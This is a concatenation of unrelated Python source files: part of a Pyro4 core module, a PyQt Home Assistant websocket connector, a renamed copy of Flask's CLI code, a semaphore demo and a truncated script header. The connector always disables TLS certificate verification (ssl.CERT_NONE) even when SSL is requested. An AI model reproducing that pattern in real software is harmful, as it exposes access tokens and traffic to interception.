# Clear cache regardless of how it is accessed
util.reset_exposed_members(registered_object, config.REQUIRE_EXPOSE, as_lists=True)
util.reset_exposed_members(registered_object, config.REQUIRE_EXPOSE, as_lists=False)
def proxyFor(self, objectOrId, nat=True):
"""
Get a fully initialized Pyro Proxy for the given object (or object id) for this daemon.
If nat is False, the configured NAT address (if any) is ignored.
The object or id must be registered in this daemon, or you'll get an exception.
(you can't get a proxy for an unknown object)
"""
uri = self.uriFor(objectOrId, nat)
proxy = Proxy(uri)
try:
registered_object = self.objectsById[uri.object]
except KeyError:
raise errors.DaemonError("object isn't registered in this daemon")
meta = util.get_exposed_members(registered_object, only_exposed=config.REQUIRE_EXPOSE)
proxy._pyroGetMetadata(known_metadata=meta)
return proxy
def close(self):
"""Close down the server and release resources"""
self.__mustshutdown.set()
self.streaming_responses = {}
if self.transportServer:
log.debug("daemon closing")
self.transportServer.close()
self.transportServer = None
def annotations(self):
"""Override to return a dict with custom user annotations to be sent with each response message."""
return {}
def combine(self, daemon):
"""
Combines the event loop of the other daemon in the current daemon's loop.
You can then simply run the current daemon's requestLoop to serve both daemons.
This works fine on the multiplex server type, but doesn't work with the threaded server type.
"""
log.debug("combining event loop with other daemon")
self.transportServer.combine_loop(daemon.transportServer)
def __annotations(self):
annotations = current_context.response_annotations
if current_context.correlation_id:
annotations["CORR"] = current_context.correlation_id.bytes
else:
annotations.pop("CORR", None)
annotations.update(self.annotations())
return annotations
def __repr__(self):
if hasattr(self, "locationStr"):
family = socketutil.family_str(self.sock)
return "<%s.%s at 0x%x; %s - %s; %d objects>" % (self.__class__.__module__, self.__class__.__name__,
id(self), self.locationStr, family, len(self.objectsById))
else:
# daemon objects may come back from serialized form without being properly initialized (by design)
return "<%s.%s at 0x%x; unusable>" % (self.__class__.__module__, self.__class__.__name__, id(self))
def __enter__(self):
if not self.transportServer:
raise errors.PyroError("cannot reuse this object")
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getstate__(self):
# A little hack to make it possible to serialize Pyro objects, because they can reference a daemon,
# but it is not meant to be able to properly serialize/deserialize Daemon objects.
return {}
def __getstate_for_dict__(self):
return tuple(self.__getstate__())
def __setstate_from_dict__(self, state):
pass
if sys.version_info < (3, 0):
__lazy_dict_iterator_types = (type({}.iterkeys()), type({}.itervalues()), type({}.iteritems()))
else:
__lazy_dict_iterator_types = (type({}.keys()), type({}.values()), type({}.items()))
def _streamResponse(self, data, client):
if sys.version_info < (3, 4):
from collections import Iterator
else:
from collections.abc import Iterator
if isinstance(data, Iterator) or inspect.isgenerator(data):
if config.ITER_STREAMING:
if type(data) in self.__lazy_dict_iterator_types:
raise errors.PyroError("won't serialize or stream lazy dict iterators, convert to list yourself")
stream_id = str(uuid.uuid4())
self.streaming_responses[stream_id] = (client, time.time(), 0, data)
return True, stream_id
return True, None
return False, data
def __deserializeBlobArgs(self, protocolmsg):
import marshal
blobinfo = protocolmsg.annotations["BLBI"]
if sys.platform == "cli" and type(blobinfo) is not str:
# Ironpython's marshal expects str...
blobinfo = str(blobinfo)
blobinfo, objId, method = marshal.loads(blobinfo)
blob = SerializedBlob(blobinfo, protocolmsg, is_blob=True)
return objId, method, (blob,), {} # object, method, vargs, kwargs
# serpent serializer initialization
try:
import serpent
def pyro_class_serpent_serializer(obj, serializer, stream, level):
# Override the default way that a Pyro URI/proxy/daemon is serialized.
# Because it defines a __getstate__ it would otherwise just become a tuple,
# and not be deserialized as a class.
d = util.SerializerBase.class_to_dict(obj)
serializer.ser_builtins_dict(d, stream, level)
# register the special serializers for the pyro objects with Serpent
serpent.register_class(URI, pyro_class_serpent_serializer)
serpent.register_class(Proxy, pyro_class_serpent_serializer)
serpent.register_class(Daemon, pyro_class_serpent_serializer)
serpent.register_class(futures._ExceptionWrapper, pyro_class_serpent_serializer)
except ImportError:
pass
def serialize_core_object_to_dict(obj):
return {
"__class__": "Pyro4.core." + obj.__class__.__name__,
"state": obj.__getstate_for_dict__()
}
util.SerializerBase.register_class_to_dict(URI, serialize_core_object_to_dict, serpent_too=False)
util.SerializerBase.register_class_to_dict(Proxy, serialize_core_object_to_dict, serpent_too=False)
util.SerializerBase.register_class_to_dict(Daemon, serialize_core_object_to_dict, serpent_too=False)
util.SerializerBase.register_class_to_dict(futures._ExceptionWrapper, futures._ExceptionWrapper.__serialized_dict__, serpent_too=False)
def _log_wiredata(logger, text, msg):
"""logs all the given properties of the wire message in the given logger"""
corr = str(uuid.UUID(bytes=msg.annotations["CORR"])) if "CORR" in msg.annotations else "?"
logger.debug("%s: msgtype=%d flags=0x%x ser=%d seq=%d corr=%s\nannotations=%r\ndata=%r" %
(text, msg.type, msg.flags, msg.serializer_id, msg.seq, corr, msg.annotations, msg.data))
class _CallContext(threading.local):
def __init__(self):
# per-thread initialization
self.client = None
self.client_sock_addr = None
self.seq = 0
self.msg_flags = 0
self.serializer_id = 0
self.annotations = {}
self.response_annotations = {}
self.correlation_id = None
def to_global(self):
if sys.platform != "cli":
return dict(self.__dict__)
# ironpython somehow has problems getting at the values, so do it manually:
return {
"client": self.client,
"seq": self.seq,
"msg_flags": self.msg_flags,
"serializer_id": self.serializer_id,
"annotations": self.annotations,
"response_annotations": self.response_annotations,
"correlation_id": self.correlation_id,
"client_sock_addr": self.client_sock_addr
}
def from_global(self, values):
self.client = values["client"]
self.seq = values["seq"]
self.msg_flags = values["msg_flags"]
self.serializer_id = values["serializer_id"]
self.annotations = values["annotations"]
self.response_annotations = values["response_annotations"]
self.correlation_id = values["correlation_id"]
self.client_sock_addr = values["client_sock_addr"]
def track_resource(self, resource):
"""keep a weak reference to the resource to be tracked for this connection"""
if self.client:
self.client.tracked_resources.add(resource)
else:
raise errors.PyroError("cannot track resource on a connectionless call")
def untrack_resource(self, resource):
"""no longer track the resource for this connection"""
if self.client:
self.client.tracked_resources.discard(resource)
else:
raise errors.PyroError("cannot untrack resource on a connectionless call")
class _OnewayCallThread(threading.Thread):
def __init__(self, target, args, kwargs):
super(_OnewayCallThread, self).__init__(target=target, args=args, kwargs=kwargs, name="oneway-call")
self.daemon = True
self.parent_context = current_context.to_global()
def run(self):
current_context.from_global(self.parent_context)
super(_OnewayCallThread, self).run()
# name server utility function, here to avoid cyclic dependencies
def _resolve(uri, hmac_key=None):
"""
Resolve a 'magic' uri (PYRONAME, PYROMETA) into the direct PYRO uri.
It finds a name server, and use that to resolve a PYRONAME uri into the direct PYRO uri pointing to the named object.
If uri is already a PYRO uri, it is returned unmodified.
You can consider this a shortcut function so that you don't have to locate and use a name server proxy yourself.
Note: if you need to resolve more than a few names, consider using the name server directly instead of repeatedly
calling this function, to avoid the name server lookup overhead from each call.
"""
if isinstance(uri, basestring):
uri = URI(uri)
elif not isinstance(uri, URI):
raise TypeError("can only resolve Pyro URIs")
if uri.protocol == "PYRO":
return uri
log.debug("resolving %s", uri)
if uri.protocol == "PYRONAME":
with _locateNS(uri.host, uri.port, hmac_key=hmac_key) as nameserver:
return nameserver.lookup(uri.object)
elif uri.protocol == "PYROMETA":
with _locateNS(uri.host, uri.port, hmac_key=hmac_key) as nameserver:
candidates = nameserver.list(metadata_all=uri.object)
if candidates:
candidate = random.choice(list(candidates.values()))
log.debug("resolved to candidate %s", candidate)
return URI(candidate)
raise errors.NamingError("no registrations available with desired metadata properties %s" % uri.object)
else:
raise errors.PyroError("invalid uri protocol")
# name server utility function, here to avoid cyclic dependencies
def _locateNS(host=None, port=None, broadcast=True, hmac_key=None):
"""Get a proxy for a name server somewhere in the network."""
if host is None:
# first try localhost if we have a good chance of finding it there
if config.NS_HOST in ("localhost", "::1") or config.NS_HOST.startswith("127."):
if ":" in config.NS_HOST: # ipv6
hosts = ["[%s]" % config.NS_HOST]
else:
# Some systems (Debian Linux) have 127.0.1.1 in the hosts file assigned to the hostname,
# try this too for convenience sake (only if it's actually used as a valid ip address)
try:
socket.gethostbyaddr("127.0.1.1")
hosts = [config.NS_HOST] if config.NS_HOST == "127.0.1.1" else [config.NS_HOST, "127.0.1.1"]
except socket.error:
hosts = [config.NS_HOST]
for host in hosts:
uristring = "PYRO:%s@%s:%d" % (constants.NAMESERVER_NAME, host, port or config.NS_PORT)
log.debug("locating the NS: %s", uristring)
proxy = Proxy(uristring)
proxy._pyroHmacKey = hmac_key
try:
proxy._pyroBind()
log.debug("located NS")
return proxy
except errors.PyroError:
pass
if config.PREFER_IP_VERSION == 6:
broadcast = False # ipv6 doesn't have broadcast. We should probably use multicast....
if broadcast:
# broadcast lookup
if not port:
port = config.NS_BCPORT
log.debug("broadcast locate")
sock = socketutil.createBroadcastSocket(reuseaddr=config.SOCK_REUSE, timeout=0.7)
for _ in range(3):
try:
for bcaddr in config.parseAddressesString(config.BROADCAST_ADDRS):
try:
sock.sendto(b"GET_NSURI", 0, (bcaddr, port))
except socket.error as x:
err = getattr(x, "errno", x.args[0])
# handle some errno's that some platforms like to throw:
if err not in socketutil.ERRNO_EADDRNOTAVAIL and err not in socketutil.ERRNO_EADDRINUSE:
raise
data, _ = sock.recvfrom(100)
sock.close()
if sys.version_info >= (3, 0):
data = data.decode("iso-8859-1")
log.debug("located NS: %s", data)
proxy = Proxy(data)
proxy._pyroHmacKey = hmac_key
return proxy
except socket.timeout:
continue
try:
sock.shutdown(socket.SHUT_RDWR)
except (OSError, socket.error):
pass
sock.close()
log.debug("broadcast locate failed, try direct connection on NS_HOST")
else:
log.debug("skipping broadcast lookup")
# broadcast failed or skipped, try PYRO directly on specific host
host = config.NS_HOST
port = config.NS_PORT
# pyro direct lookup
if not port:
port = config.NS_PORT
if URI.isUnixsockLocation(host):
uristring = "PYRO:%s@%s" % (constants.NAMESERVER_NAME, host)
else:
# if not a unix socket, check for ipv6
if ":" in host:
host = "[%s]" % host
uristring = "PYRO:%s@%s:%d" % (constants.NAMESERVER_NAME, host, port)
uri = URI(uristring)
log.debug("locating the NS: %s", uri)
proxy = Proxy(uri)
proxy._pyroHmacKey = hmac_key
try:
proxy._pyroBind()
log.debug("located NS")
return proxy
except errors.PyroError as x:
e = errors.NamingError("Failed to locate the nameserver")
if sys.version_info >= (3, 0):
e.__cause__ = x
raise e
class SerializedBlob(object):
"""
Used to wrap some data to make Pyro pass this object transparently (it keeps the serialized payload as-is)
Only when you need to access the actual client data you can deserialize on demand.
This makes efficient, transparent gateways or dispatchers and such possible:
they don't have to de/reserialize the message and are independent from the serialized class definitions.
You have to pass this as the only parameter to a remote method call for Pyro to understand it.
Init arguments:
``info`` = some (small) descriptive data about the blob. Can be a simple id or name or guid. Must be marshallable.
``data`` = the actual client data payload that you want to transfer in the blob. Can be anything that you would
otherwise have used as regular remote call arguments.
"""
def __init__(self, info, data, is_blob=False):
self.info = info
self._data = data
self._contains_blob = is_blob
def deserialized(self):
"""Retrieves the client data stored in this blob. Deserializes the data automatically if required."""
if self._contains_blob:
protocol_msg = self._data
serializer = util.get_serializer_by_id(protocol_msg.serializer_id)
_, _, data, _ = serializer.deserializeData(protocol_msg.data, protocol_msg.flags & message.FLAGS_COMPRESSED)
return data
else:
return self._data
# call context thread local
current_context = _CallContext()
"""the context object for the current call. (thread-local)"""
# 'async' keyword backwards compatibility for Python versions older than 3.7. New code should not use this!
if sys.version_info < (3, 7):
def asyncproxy(proxy, asynchronous=True, **kwargs):
"""convenience method to set proxy to asynchronous or sync mode."""
if kwargs:
kword = list(kwargs.keys())
if kword != ["async"]:
raise TypeError("asyncproxy() got an unexpected keyword argument '{:s}'".format(kword[0]))
asynchronous = kwargs["async"]
proxy._pyroAsync(asynchronous)
current_module = sys.modules[__name__]
pyro4_module = __import__("Pyro4")
current_module.__dict__["async"] = pyro4_module.__dict__["async"] = asyncproxy
|
Connectors.py
|
import logging
import time
import psutil
import socket
import websocket
import ssl
import simplejson as json
from threading import Thread
from enum import Enum
from PyQt5.QtGui import QGuiApplication
from PyQt5.QtCore import QDateTime, QObject, pyqtSignal, pyqtProperty, pyqtSlot
class LocalConnector(QObject):
dateTimeChanged = pyqtSignal(QDateTime)
cpuUsageChanged = pyqtSignal(int)
memUsageChanged = pyqtSignal(int)
memTotalChanged = pyqtSignal(int)
memFreeChanged = pyqtSignal(int)
hostnameChanged = pyqtSignal(str)
def __init__(self):
QObject.__init__(self)
self._dateTime = QDateTime()
self._cpuUsage = 0
self._memUsage = 0
self._memTotal = 0
self._memFree = 0
self._hostname = ""
def startUpdateLoop(self):
self.updateThread = Thread(target=self._updateLoop, daemon=True)
self.updateThread.start()
def _updateLoop(self):
while True:
self.dateTime = QDateTime.currentDateTime()
self.cpuUsage = psutil.cpu_percent()
self.hostname = socket.gethostname()
memInfo = psutil.virtual_memory()
self.memUsage = memInfo.percent
self.memTotal = memInfo.total
self.memFree = memInfo.available
time.sleep(0.5)
@pyqtProperty(QDateTime, notify=dateTimeChanged)
def dateTime(self):
return self._dateTime
@dateTime.setter
def dateTime(self, value):
self._dateTime = value
self.dateTimeChanged.emit(value)
@pyqtProperty(int, notify=cpuUsageChanged)
def cpuUsage(self):
return self._cpuUsage
@cpuUsage.setter
def cpuUsage(self, value):
if self._cpuUsage == value: return
self._cpuUsage = value
self.cpuUsageChanged.emit(value)
@pyqtProperty(int, notify=memUsageChanged)
def memUsage(self):
return self._memUsage
@memUsage.setter
def memUsage(self, value):
if self._memUsage == value: return
self._memUsage = value
self.memUsageChanged.emit(value)
@pyqtProperty(int, notify=memTotalChanged)
def memTotal(self):
return self._memTotal
@memTotal.setter
def memTotal(self, value):
if self._memTotal == value: return
self._memTotal = value
self.memTotalChanged.emit(value)
@pyqtProperty(int, notify=memFreeChanged)
def memFree(self):
return self._memFree
@memFree.setter
def memFree(self, value):
if self._memFree == value: return
self._memFree = value
self.memFreeChanged.emit(value)
@pyqtProperty(str, notify=hostnameChanged)
def hostname(self):
return self._hostname
@hostname.setter
def hostname(self, value):
if self._hostname == value: return
self._hostname = value
self.hostnameChanged.emit(value)
class HomeAssistantConnector(QObject):
entitiesChanged = pyqtSignal(dict)
def __init__(self, host, port, accessToken, useSSL):
QObject.__init__(self)
self._host = host
self._port = port
self._accessToken = accessToken
self._useSSL = useSSL
self._logger = logging.getLogger("hass")
self._msgId = 0
self._requestCurrentStateMsgId = 0
self._autoReconnectIntervalInSecs = 5
self._entities = {}
def connect(self):
proto = "wss" if self._useSSL else "ws"
url = f"{proto}://{self._host}:{self._port}/api/websocket"
self._client = websocket.WebSocketApp(url, on_open=self._onOpen, on_message=self._onMessage)
self._workerThread = Thread(target=self._keep_connected_forever, args=(True,), daemon=True)
self._workerThread.start()
def _keep_connected_forever(self, ignoreBadSSLCerts):
while True:
try:
sslopt = {"cert_reqs":ssl.CERT_NONE} if ignoreBadSSLCerts else None
self._client.run_forever(sslopt=sslopt)
self._logger.info(f"Connection closed (reconnect in {self._autoReconnectIntervalInSecs} seconds)")
except Exception as ex:
self._logger.Info(f"Connection closed (reconnect in {self._autoReconnectIntervalInSecs} seconds): " + str(ex))
time.sleep(self._autoReconnectIntervalInSecs)
def _onOpen(self, ws):
self._logger.info("Connected to homeassistant")
def _onMessage(self, ws, message):
try:
self._logger.debug("Message recieved: " + str(message))
data = json.loads(message)
msgType = data.get("type", "")
if msgType == "auth_required": self._sendAuth()
if msgType == "auth_ok": self._onAuthOk()
if msgType == "event":
if data["event"]["event_type"] == "state_changed": self._onStateChangedEvent(data)
if msgType == "result":
if data["id"] == self._requestCurrentStateMsgId: self._onCurrentEntityStatesResult(data)
except Exception as ex:
self._logger.exception("error while processing message: " + str(ex))
def _sendAuth(self):
self._logger.info("Sending Authentication")
self._client.send(json.dumps({"type": "auth", "access_token": self._accessToken}))
def _onAuthOk(self):
self._subscribeToEvents()
self._requestCurrentEntityStates()
def _onStateChangedEvent(self, data):
newState = data["event"]["data"]["new_state"]
self._saveEntityState(newState)
def _onCurrentEntityStatesResult(self, data):
for state in data["result"]:
self._saveEntityState(state)
def _saveEntityState(self, newState):
if newState["entity_id"] not in self._entities:
self._entities[newState["entity_id"]] = HomeAssistantEntityState()
self._entities[newState["entity_id"]].moveToThread(QGuiApplication.instance().thread())
self.entitiesChanged.emit(self._entities)
self._entities[newState["entity_id"]].state = newState["state"]
self._entities[newState["entity_id"]].attrs = newState["attributes"]
def _subscribeToEvents(self):
self._send({
"id": self._getNextMsgId(),
"type": "subscribe_events",
"event_type": "state_changed"
})
def _requestCurrentEntityStates(self):
self._requestCurrentStateMsgId = self._getNextMsgId()
self._send({
"id": self._requestCurrentStateMsgId,
"type": "get_states"
})
@pyqtProperty('QVariantMap', notify=entitiesChanged)
def entities(self):
return self._entities
@entities.setter
def entities(self, value):
self._entities = value
def _send(self, data):
if type(data) is not str:
data = json.dumps(data)
self._client.send(data)
self._logger.debug("Message sent: " + data)
@pyqtSlot(int, str, str, str)
def callService(self, domain, service, data):
self._send({
"id": self._getNextMsgId(),
"type": "call_service",
"domain": domain,
"service": service,
"service_data": data
})
def _getNextMsgId(self):
self._msgId += 1
return self._msgId
@pyqtSlot(str, str)
def setClimatePresetMode(self, entityId, presetMode):
data = { "entity_id" : entityId, "preset_mode": presetMode}
self.callService("climate", "set_preset_mode", data)
@pyqtSlot(str, str)
def setHumidifierPresetMode(self, entityId, presetMode):
data = { "entity_id": entityId, "mode": presetMode }
self.callService("humidifier", "set_mode", data)
class HomeAssistantEntityState(QObject):
stateChanged = pyqtSignal(str)
attrsChanged = pyqtSignal(dict)
def __init__(self):
QObject.__init__(self)
self._attrs = {}
self._state = None
@pyqtProperty("QVariantMap", notify=attrsChanged)
def attrs(self):
return self._attrs
@attrs.setter
def attrs(self, value):
self._attrs = value
self.attrsChanged.emit(value)
@pyqtProperty(str, notify=stateChanged)
def state(self):
return self._state
@state.setter
def state(self, value):
if self._state == value: return
self._state = value
self.stateChanged.emit(value)
class ConnectorTypes(Enum):
Unknown = 0
HomeAssistant = 1
def createConnector(kind:str, name:str, config:dict):
if kind.casefold() == ConnectorTypes.HomeAssistant.name.casefold():
assert len(config.get("host","")) > 0, "Invalid host in connector " + name
assert len(config.get("accessToken")) > 0, "Invalid access_token in connector config " + name
con = HomeAssistantConnector(config["host"], config.get("port", 8123), config["accessToken"], config.get("useSSL", True))
con.connect()
return con
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flaskr.cli
~~~~~~~~~
A simple command line application to run flaskr apps.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from threading import Lock, Thread
from functools import update_wrapper
import click
from ._compat import iteritems, reraise
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in 'app', 'application':
app = getattr(module, attr_name, None)
if app is not None and isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for k, v in iteritems(module.__dict__)
if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
raise NoAppException('Failed to find application in module "%s". Are '
'you sure it contains a Flask application? Maybe '
'you wrapped it in a WSGI middleware or you are '
'using a factory function.' % module.__name__)
def prepare_exec_for_file(filename):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
module = []
# Chop off file extensions or package markers
if filename.endswith('.py'):
filename = filename[:-3]
elif os.path.split(filename)[1] == '__init__.py':
filename = os.path.dirname(filename)
else:
raise NoAppException('The file provided (%s) does exist but is not a '
'valid Python file. This means that it cannot '
'be used as application. Please change the '
'extension to .py' % filename)
filename = os.path.realpath(filename)
dirpath = filename
while 1:
dirpath, extra = os.path.split(dirpath)
module.append(extra)
if not os.path.isfile(os.path.join(dirpath, '__init__.py')):
break
sys.path.insert(0, dirpath)
return '.'.join(module[::-1])
def locate_app(app_id):
"""Attempts to locate the application."""
__traceback_hide__ = True
if ':' in app_id:
module, app_obj = app_id.split(':', 1)
else:
module = app_id
app_obj = None
__import__(module)
mod = sys.modules[module]
if app_obj is None:
app = find_best_app(mod)
else:
app = getattr(mod, app_obj, None)
if app is None:
raise RuntimeError('Failed to find application in module "%s"'
% module)
return app
class DispatchingApp(object):
"""Special application that dispatches to a flaskr application which
is imported by name in a background thread. If an error happens
it is is recorded and shows as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click.
"""
def __init__(self, app_import_path=None, debug=None, create_app=None):
#: The application import path
self.app_import_path = app_import_path
#: The debug flag. If this is not None, the application will
#: automatically have it's debug flag overridden with this value.
self.debug = debug
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
rv = self.create_app(self)
else:
if self.app_import_path is None:
raise NoAppException('Could not locate Flask application. '
'You did not provide FLASK_APP or the '
'--app parameter.')
rv = locate_app(self.app_import_path)
if self.debug is not None:
rv.debug = self.debug
self._loaded_app = rv
return rv
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
def set_debug_value(ctx, param, value):
ctx.ensure_object(ScriptInfo).debug = value
def set_app_value(ctx, param, value):
if value is not None:
if os.path.isfile(value):
value = prepare_exec_for_file(value)
elif '.' not in sys.path:
sys.path.insert(0, '.')
ctx.ensure_object(ScriptInfo).app_import_path = value
debug_option = click.Option(['--debug/--no-debug'],
help='Enable or disable debug mode.',
default=None, callback=set_debug_value)
app_option = click.Option(['-a', '--app'],
help='The application to run',
callback=set_app_value, is_eager=True)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_app_option: adds the default :option:`--app` option. This gets
automatically disabled if a `create_app`
callback is defined.
:param add_debug_option: adds the default :option:`--debug` option.
:param create_app: an optional callback that is passed the script info
and returns the loaded app.
"""
def __init__(self, add_default_commands=True, add_app_option=None,
add_debug_option=True, create_app=None, **extra):
params = list(extra.pop('params', None) or ())
if add_app_option is None:
add_app_option = create_app is None
if add_app_option:
params.append(app_option)
if add_debug_option:
params.append(debug_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
def get_command(self, ctx, name):
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
pass
return sorted(rv)
def main(self, *args, **kwargs):
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return AppGroup.main(self, *args, **kwargs)
def script_info_option(*args, **kwargs):
"""This decorator works exactly like :func:`click.option` but is eager
by default and stores the value in the :attr:`ScriptInfo.data`. This
is useful to further customize an application factory in very complex
situations.
:param script_info_key: this is a mandatory keyword argument which
defines under which data key the value should
be stored.
"""
try:
key = kwargs.pop('script_info_key')
except LookupError:
raise TypeError('script_info_key not provided.')
real_callback = kwargs.get('callback')
def callback(ctx, param, value):
if real_callback is not None:
value = real_callback(ctx, value)
ctx.ensure_object(ScriptInfo).data[key] = value
return value
kwargs['callback'] = callback
kwargs.setdefault('is_eager', True)
return click.option(*args, **kwargs)
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=False,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads):
"""Runs a local development server for the Flask application.
This local server is recommended for development purposes only but it
can also be used for simple intranet deployments. By default it will
not support any sort of concurrency at all to simplify debugging. This
can be changed with the --with-threads option which will enable basic
multithreading.
The reloader and debugger are by default enabled if the debug flag of
Flask is enabled and disabled otherwise.
"""
from werkzeug.serving import run_simple
if reload is None:
reload = info.debug
if debugger is None:
debugger = info.debug
if eager_loading is None:
eager_loading = not reload
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
# Extra startup messages. This depends a but on Werkzeug internals to
# not double execute when the reloader kicks in.
if os.environ.get('WERKZEUG_RUN_MAIN') != 'true':
# If we have an import path we can print it out now which can help
# people understand what's being served. If we do not have an
# import path because the app was loaded through a callback then
# we won't print anything.
if info.app_import_path is not None:
print(' * Serving Flask app "%s"' % info.app_import_path)
if info.debug is not None:
print(' * Forcing debug %s' % (info.debug and 'on' or 'off'))
run_simple(host, port, app, use_reloader=reload,
use_debugger=debugger, threaded=with_threads,
passthrough_errors=True)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configuring the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s%s\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.debug and ' [debug]' or '',
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
cli = FlaskGroup(help="""\
This shell command acts as general utility script for Flask applications.
It loads the application configured (either through the FLASK_APP environment
variable or the --app parameter) and then provides commands either provided
by the application or Flask itself.
The most useful commands are the "run" and "shell" command.
Example usage:
flaskr --app=hello --debug run
""")
def main(as_module=False):
this_module = __package__ + '.cli'
args = sys.argv[1:]
if as_module:
if sys.version_info >= (2, 7):
name = 'python -m ' + this_module.rsplit('.', 1)[0]
else:
name = 'python -m ' + this_module
# This module is always executed as "python -m flaskr.run" and as such
# we need to ensure that we restore the actual command line so that
# the reloader can properly operate.
sys.argv = ['-m', this_module] + sys.argv[1:]
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
main.py
|
from threading import Thread, Semaphore
count = 0
sem = Semaphore(value=1)
def worker_a():
global count
sem.acquire()
count += 1
sem.release()
def worker_b():
global count
sem.acquire()
count += 1
sem.release()
a = Thread(target=worker_a)
b = Thread(target=worker_b)
a.start()
b.start()
a.join()
b.join()
print(count)
|
main.py
|
import socket
import sys
import datetime
import time
import os
import SimpleHTTPServer
import subprocess
